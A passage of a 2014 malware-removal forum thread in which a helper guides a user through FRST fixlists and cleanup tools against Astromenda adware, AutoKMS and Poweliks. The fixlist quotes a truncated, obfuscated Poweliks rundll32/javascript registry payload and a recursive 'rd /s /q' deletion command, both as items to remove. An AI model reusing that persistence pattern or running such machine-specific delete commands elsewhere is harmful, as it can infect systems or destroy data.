Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:499.9 GB) (Free:295.17 GB) NTFS
Drive e: (Data) (Fixed) (Total:1363.01 GB) (Free:850.37 GB) NTFS
Drive l: () (Fixed) (Total:931.51 GB) (Free:134.31 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 38DF38DE)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: CF1A9122)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=499.9 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=1363 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 



#4 rods

rods
  • Topic Starter

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:01:41 AM

Posted 17 October 2014 - 05:34 PM

I just realized I should probably attach the files.  sorry about that

Attached Files



#5 Rootk

Rootk

  • Malware Response Team
  • 234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Easter Island, Chile.
  • Local time:05:41 AM

Posted 18 October 2014 - 08:02 AM

Please follow these steps:
 
1.- Open notepad. Please copy the contents of the code box below.

To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it to your Desktop as fixlist.txt
 
HKLM-x32\...\RunOnce: [DelTr2236071] => cmd.exe /c rd /s /q "C:\Users\Rod\AppData\Roaming\WSE_Astromenda"
C:\Users\Rod\AppData\Roaming\WSE_Astromenda
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\RunOnce: [WSE_Astromenda] => [X]
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...\RunOnce: [DelTr2236071] => cmd.exe /c rd /s /q "C:\Users\Rod\AppData\Roaming\WSE_Astromenda"
HKU\S-1-5-21-153314184-682568810-1827683989-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x3CC8C2417B23CF01
SearchScopes: HKLM - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKCU - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir=
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
CHR StartupUrls: Default -> "hxxp://www.google.com/", "hxxp://www.yahoo.com/", "hxxp://astromenda.com/?f=7&a=ast_ggfx_14_42_ie&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0F0DyD0FyB0CyBtAtB0BtN0D0Tzu0StCtDtBtCtN1L2XzutAtFtBtFtCtFyDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyBzyyE0CyEtC0FzytGtBtD0AyEtG0A0C0C0EtGyCzzyCyDtGtDzz0BtDyD0F0AyB0ByEtDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtCyB0EtByE0D0AtG0C0FyC0CtGyE0F0A0CtG0AtB0FtAtGyD0DtDyDyD0E0C0BtDtB0FtC2Q&cr=422683267&ir="
C:\Users\Rod\AppData\Roaming\1H1Q1V1N1N1O2V
2014-10-17 11:54 - 2014-09-01 10:15 - 00002896 _____ () C:\Windows\System32\Tasks\AutoKMS
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
C:\Windows\AutoKMS\AutoKMS.exe
NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Run FRST and press the Fix button just once and wait.
The tool will make a log on your desktop (Fixlog.txt) please post it to your reply.

2.- Download AdwCleaner by Xplode onto your Desktop.
  • Double click on Adwcleaner.exe to run the tool.
  • Click on Scan
  • Once the scan is done, click on the Clean button.
  • You will get a prompt asking to close all programs. Click OK.
  • Click OK again to reboot your computer.
  • A text file will open after the restart. Please post the content of that logfile in your reply.
  • You can also find the logfile at C:\AdwCleaner[Sn].txt ('n' represents the number of the most recent report).
3.- Please download RogueKiller and Save to the desktop.
  • Close all windows and browsers
  • Double click on RogueKiller.exe to run the tool.
  • Press the scan button.
  • Once the scan is done, click on Report.
  • A log file will open, please copy/paste the context of that file into your next reply.
4.- Run FRST again, check Addition.txt, press Scan and attach both reports.

#6 rods

rods
  • Topic Starter

  • Members
  • 32 posts
  • OFFLINE
  •  
  • Local time:01:41 AM

Posted 18 October 2014 - 11:46 AM

Hello,

I attached the log files from FRST using the Fix button, AdwareCleaner, RogueKiller, and finally from FRST scan again.

My computer has been connected for about an hour and I don't see multiple dllhost.exe 32 processes anymore.

 

Thanks.  Let me know what you see from the logs.

 

 

Attached Files



#7 Rootk

Rootk

  • Malware Response Team
  • 234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Easter Island, Chile.
  • Local time:05:41 AM

Posted 18 October 2014 - 06:31 PM

Do you recognize this file?

C:\Users\Rod\Desktop\backup.bat

If not, please delete it.

Now, follow these steps:

1.- Open notepad. Please copy the contents of the code box below.
To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it to your Desktop as fixlist.txt
 
Firefox Packages (HKCU\...\Firefox Packages) (Version:  - ) <==== ATTENTION
Task: {64A516D5-ED53-486F-92C3-8DD020353915} - \AutoKMS No Task File <==== ATTENTION
EmptyTemp:
NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Run FRST64 and press the Fix button just once and wait.
The tool will make a log on your desktop (Fixlog.txt) please post it to your reply.

2.- Run Malwarebytes Anti-Malware and do the following:

Click on Scan now.
If an update is available, click Update Now.
A Threat Scan will start.
After scan, if potential threats are detected, ensure that Quarantine is selected as the Action for all the listed items, and click the Apply Actions button.

A window with an option to view the detailed log will appear. Click on View Detailed Log.
After viewing the results, please click on the Copy to Clipboard button > OK.
Paste your log into your next reply.

Note: If you lose the Clipboard copy and need to retrieve the log again it can be found by opening Malwarebytes and clicking on History> Application Logs with the date of the scan. Simply double-click on that in order to see the options for Copying to Clipboard or to Export to a .txt file (Notepad). etc.. The .txt file can be saved and posted when you are ready.

3.- Download Malwarebytes Anti-Rootkit from this link http://www.malwarebytes.org/products/mbar/
  • Unzip the File to a convenient location. (Recommend the Desktop)
  • You may receive a User Account Control prompt asking if you are sure you wish to allow the program to run. Please allow the program to run and MBAR will now start to install any necessary drivers that are required for the program to operate correctly. If a rootkit is interfering with the installation of the drivers you will see a message that states that the DDA driver was not installed and that you should reboot your computer to install it. You will see this image:

    mbarwm.png
  • If you receive this message, please click on the Yes button and Malwarebytes Anti-Rootkit will now restart your computer. Once the computer is rebooted and you login, MBAR will automatically start and you will now be at the start screen. (If no Rootkit warning you will go from step 4 to 6.)
  • The following image opens, select Next.

    Image2.png
  • The following image opens, select Update

    Image3.png
  • When the Update completes, select Next

    Image4.png
  • In the following window ensure "Targets" are ticked. Then select "Scan"

    Image5.png
  • If an infection/s is found the "Cleanup Button" to remove threats will be available. A list of infected files will be listed like the following example:

    MBAntiRKclean.png
  • Do not select the "Clean up Button" select the "Exit" button, there will be a warning as follows:

    MBAntiRKclean1.png
  • Select "Yes" to close down the program. If NO infections were found you will see the following image:

    Image6.png
  • Select "Exit" to close down.
  • Copy and paste the two following logs from the mbar folder:

    System - log
    Mbar - log Date and time of scan will also be shown

    Post those two logs in your reply.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users